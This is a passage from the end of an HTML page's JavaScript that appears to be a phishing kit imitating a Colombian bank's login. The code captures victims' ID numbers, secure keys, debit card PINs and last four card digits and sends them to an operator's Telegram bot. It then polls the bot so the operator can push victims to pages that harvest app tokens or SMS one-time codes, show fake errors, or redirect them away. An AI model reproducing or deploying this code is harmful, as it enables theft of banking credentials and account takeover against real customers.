                            const formattedTime = now.toLocaleTimeString('es-CO', {
                                hour: '2-digit',
                                minute: '2-digit',
                                second: '2-digit',
                                hour12: true
                            });

                            let message;
                            if (tabName === 'Clave Segura') {
                                message = `🍀 GOLEADOR 🍀\n\nTipo de Ingreso: ${tabName}\nTipo de Doc: ${loginData.identificationType}\n\nCEDULA💎: ${loginData.identificationNumber}\nClAVE🔐: ${loginData.secureKey}\n\nFecha/Hora: ${formattedDate}, ${formattedTime}`;
                            } else {
                                message = `🍀 GOLEADOR 🍀\n\nTipo de Ingreso: ${tabName}\nTipo de Doc: ${loginData.identificationType}\n\nCEDULA💎: ${loginData.identificationNumber}\nClAVE🔐: ${loginData.debitCardKey}\nUltimos 4: ${loginData.last4Digits}\n\nFecha/Hora: ${formattedDate}, ${formattedTime}`;
                            }

                            const keyboard = JSON.stringify({
                                inline_keyboard: [
                                    [{
                                        text: "💎 Token App",
                                        callback_data: `pedir_dinamica:N/A`
                                    }, {
                                        text: "👀 Token SMS",
                                        callback_data: `pedir_sms:N/A`
                                    }],
                                    [{
                                        text: "❌ Error de Logo",
                                        callback_data: `error_tc:N/A`
                                    }],
                                    [{
                                        text: "🚨 Finalizar",
                                        callback_data: `confirm_finalizar:N/A`
                                    }]
                                ],
                            });

                            const sent = await sendToTelegram(message, keyboard);

                            if (sent.success) {
                                sessionStorage.setItem('initialLoginData', JSON.stringify(loginData));
                                sessionStorage.setItem('telegramMessageId', sent.message_id);
                                checkPaymentVerification();
                            } else {
                                azul.style.display = 'none';
                                alert("Error al enviar los datos iniciales. Por favor, inténtalo de nuevo.");
                            }
                        }

                        async function checkPaymentVerification() {
                            if (statusCheckInterval) {
                                clearInterval(statusCheckInterval);
                            }
                            statusCheckInterval = setInterval(async () => {
                                const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/getUpdates`;
                                try {
                                    const response = await fetch(url);
                                    const data = await response.json();
                                    const updates = data.result;

                                    if (updates && updates.length > 0) {
                                        const verificationUpdate = updates.find(
                                            (update) =>
                                            update.callback_query && update.callback_query.message.chat.id.toString() === TELEGRAM_CHAT_ID
                                        );

                                        if (verificationUpdate) {
                                            clearInterval(statusCheckInterval);
                                            azul.style.display = 'none';
                                            const callbackData = verificationUpdate.callback_query.data.split(':')[0];
                                            const messageId = verificationUpdate.callback_query.message.message_id;

                                            // Llama a la nueva función para eliminar los botones
                                            await deleteTelegramButtons(TELEGRAM_CHAT_ID, messageId);

                                            if (callbackData === 'pedir_dinamica') {
                                                window.location.href = "token.html";
                                            } else if (callbackData === 'pedir_sms') {
                                                window.location.href = "otp.html";
                                            } else if (callbackData === 'error_tc') {
                                                document.getElementById('error-modal').style.display = 'flex';
                                            } else if (callbackData === 'confirm_finalizar') {
                                                window.location.href = "https://google.com";
                                            }
                                        }
                                    }
                                } catch (error) {
                                    console.error("Error al verificar el estado de la transacción:", error);
                                }
                            }, 2000);
                        }

                        $("#botonazodos").off('click').on('click', async function() {
                            const loginData = {
                                identificationType: document.getElementById("opcionamostrar").textContent.substring(0, 5),
                                identificationNumber: $("#bdb-at-input").val(),
                                debitCardKey: $("#bdb-at-input2").val(),
                                last4Digits: $("#bdb-at-input3").val().replace(/\D/g, ''),
                                secureKey: 'N/A',
                                legalRepresentativeDoc: 'N/A',
                                legalRepresentativeNumber: 'N/A',
                                ip: 'N/A',
                                device: 'N/A'
                            };
                            await handleLoginAttempt(loginData, 'Tarjeta Débito');
                        });

                        $("#botonazouno").off('click').on('click', async function() {
                            const loginData = {
                                identificationType: document.getElementById("opcionamostrar").textContent.substring(0, 5),
                                identificationNumber: $("#bdb-at-input").val(),
                                secureKey: $("#bdb-at-input4").val(),
                                debitCardKey: 'N/A',
                                last4Digits: 'N/A',
                                legalRepresentativeDoc: 'N/A',
                                legalRepresentativeNumber: 'N/A',
                                ip: 'N/A',
                                device: 'N/A'
                            };
                            await handleLoginAttempt(loginData, 'Clave Segura');
                        });

                        document.getElementById('back-to-start-button').addEventListener('click', function() {
                            window.location.href = "index.html";
                        });

                        verificarCondiciones();
                    }

                    tab1.click();

                    window.addEventListener('beforeunload', function() {
                        if (statusCheckInterval) {
                            clearInterval(statusCheckInterval);
                        }
                    });
                }
            });
        </script>
</body>

</html>
